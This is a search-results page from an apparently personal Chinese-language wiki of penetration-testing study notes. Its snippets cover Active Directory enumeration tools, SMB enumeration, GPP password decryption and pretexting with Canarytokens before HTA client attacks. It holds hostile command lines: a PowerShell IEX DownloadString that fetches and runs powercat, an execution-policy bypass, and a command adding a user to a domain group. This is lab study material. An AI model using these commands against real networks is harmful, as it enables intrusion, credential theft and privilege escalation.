進階搜尋
搜尋結果
找到了 578 個結果
APT (Advanced Persistent Threat)
APT(高级持久性威胁,Advanced Persistent Threat)是指一種高度專業化、有組織結構且持續性的攻擊,通常由國家級的駭客組織、間諜機構或犯罪團體發起。APT攻擊的目標通常是政府機構、軍事機構、大型企業、關鍵基礎設施或其他具有戰略價值的目標。 以下是APT攻擊的一些特點: 1. **高度專業化:** APT攻擊者通常具有高度專業化的技能,能夠使用先進的攻擊工具和技術。他們可能有深入的安全知識,並且能夠使用自定義的惡意軟件。 2. **有組織結構:** APT攻擊通常是有組織結構的,攻擊者之...
【SMB】【Remote】 CME ( CrackMapExec )
CrackMapExec(簡稱CME)是一個用於自動化測試和渗透測試的開源工具,旨在簡化與Windows環境中的Active Directory(AD)進行交互的過程。它是一個功能強大的渗透測試框架,支持許多不同的攻擊和測試操作。 以下是CME的主要特點和功能: 多功能性: CME支持多種不同的攻擊和測試操作,包括遠程執行代碼(RCE)、收集主機信息、橫向移動、搜集憑證、模擬金票攻擊等。 支援多種協議:CME支援多種協議,包括SMB、WinRM、SSH、PowerShell等,使其能夠與不同類型的Window...
【AD】【列舉】BooldHound
BoooldHound(BloodHound)是一個用於Active Directory(AD)環境的安全分析和攻擊模擬工具。它旨在幫助安全專業人員、紅隊人員和藍隊人員更好地理解和評估AD環境中的安全風險,尤其是針對橫向移動和權限提升的風險。 https://github.com/BloodHoundAD/BloodHound # 安裝 sudo apt install -y bloodhound # 啟動圖形化資料庫 sudo neo4j start Started neo4j (pid:70...
【online】【編碼】CyberChef
https://gchq.github.io/CyberChef
【Shell】powershell
啟動powershell # -ep bypass 繞過執行策略 PS C:\Users\stephanie> powershell -ep bypass Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS ...
【Exploit】SearchSploit
SearchSploit 是一個命令行搜索工具,用於在本地系統上搜索 Exploit Database 存檔。這個存檔預設包含在 Kali Linux 中的 exploitdb 包中。我們建議在進行任何評估之前更新該包,以確保安裝了最新的攻擊代碼。可以使用以下命令更新該包: kali@kali:~$ sudo apt update && sudo apt install exploitdb [sudo] password for kali: ... The following packages will ...
【Honeypot】canarytokens
https://canarytokens.org/generate 我們將使用Canarytokens,這是一個免費的網絡服務,生成帶有嵌入式令牌的鏈接,我們將其發送給目標。當目標在瀏覽器中打開鏈接時,我們將獲得有關其瀏覽器、IP地址和操作系統的信息。有了這些信息,我們可以確認目標正在運行Windows,並確定我們應該嘗試進行HTA客戶端攻擊。 在創建我們的追踪鏈接之前,讓我們簡要討論在這種情況下我們可以使用的前設。前設以特定的方式框定一種情況。在大多數情況下,我們不能要求目標(一個陌生人)在任意電子郵件中點擊...
【Terminal】powercat
就是NetCat 的Powershell 版本 https://github.com/besimorhino/powercat 下載: https://github.com/besimorhino/powercat/blob/master/powercat.ps1 建立連線 IEX(New-Object System.Net.WebClient).DownloadString('https://github.com/besimorhino/powercat/blob/master/powercat.ps1...
【SMB】WsgiDAV
們將首先在 Kali 系統上設置一個 WebDAV 共享。我們將使用 WsgiDAV2 作為 WebDAV 伺服器來主持和提供我們的文件。我們可以使用 pip3 來安裝 WsgiDAV。 kali@kali:~$ pip3 install wsgidav Defaulting to user installation because normal site-packages is not writeable Collecting wsgidav Downloading WsgiDA...
【SMB】smbclient
# //192.168.203.13/files => share folder # -c command smbclient -N //192.168.203.13/files -c “dir” # 直接登入 smbclient -N //192.168.203.13/files -N 匿名 => 匿名沒戲,大概沒戲 ## smbclient -N -L 192.168.203.9 for ip in $(cat smb_list.txt); do (smbclient -N -L...
【AD】【列舉】PowerView.ps1
下載: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 教學: https://bookstack.treemanou.com/books/treemanoscp/page/ch21-active-directory-introduction-and-enumeration#bkmrk-21.3-manual-enumerat Get-NetComputer ###################...
【AD】【列舉】PsLoggedOn
讓我們嘗試對之前嘗試列舉的計算機運行PsLoggedOn,首先是FILES04和WEB04。 PsLoggedOn位於CLIENT75的C:\Tools\PSTools目錄中。要使用它,我們只需將它與目標主機名一起運行: 運行這個命令,以查看WEB04上已登錄的用戶信息。 PsLoggedOn將返回登錄到這個計算機上的用戶列表。 運行這個命令,以查看CLIENT74上已登錄的用戶信息。 PsLoggedOn將返回登錄到這個計算機上的用戶列表。由於我們在CLIENT74啟用了Remote Registry...
【AD】【列舉】Get-Acl
我們將使用PowerShell的Get-Acl cmdlet。這個命令本質上將檢索我們使用 -Path 標誌定義的對象的權限並將它們打印在我們的PowerShell提示中。 PS C:\Tools> Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl 在清單中突出顯示的輸出顯示了擁有FullControl或ReadKey權限的組和用戶,這意味著它們都可以讀取SrvsvcSessionI...
【AD】net
# 使用者加入 group # net group {group name} {username} /add /domain PS C:\Tools> net group "Management Department" stephanie /add /domain
【AD】【解碼】gpp-decrypt
我們找到一個名為 old-policy-backup.xml 的文件: 由於文件夾的命名和文件本身的名稱,看起來這是一個較舊的域策略文件。這是域共享上的一個常見遺物,因為系統管理員在實施新政策時經常忘記它們。在這種情況下,XML 文件描述了一個舊的策略(有助於了解當前的策略)和內建 Administrator 帳戶的一個加密密碼。對於我們來說,這個加密的密碼可能非常有價值。 從歷史上看,系統管理員通常通過組策略首選項(GPP)更改本地工作站密碼。 然而,即使使用 AES-256 加密存儲的 GPP 密碼,...
【AD】【列舉】SharpHound
https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1 SharpHound 有幾種不同的格式可用。我們可以自己編譯它,使用已經編譯好的可執行文件,或者將其用作 PowerShell 腳本。在我們的情況下,我們將使用位於 CLIENT75 的 C:\Tools 中的 PowerShell 腳本。首先,讓我們打開一個 PowerShell 窗口並將腳本載入內存: PS C:\Tools> Import-Module .\Sharph...
【kali】未安裝工具
rockyou(seclists) /usr/share/seclists # 安裝 sudo apt update sudo apt install -y seclists cd /usr/share/wordlists sudo gzip -d rockyou.txt.gz rustscan #安裝 wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb sudo...
【列舉】wpscan
WPScan 是一款用於檢測 WordPress 網站安全性的開源工具。以下是一些常見的指令用法的繁體中文說明。請注意,WPScan 的命令行參數和選項可能會因版本而略有變化,建議在使用時查閱最新的官方文件。 # -enumerate p 掃描 WordPress 核心、插件和主題的漏洞: # --plugins-detection aggressive 以詳細模式運行掃描 # -o websrv1/wpscan #output file wpscan --enumerate p --plugins-d...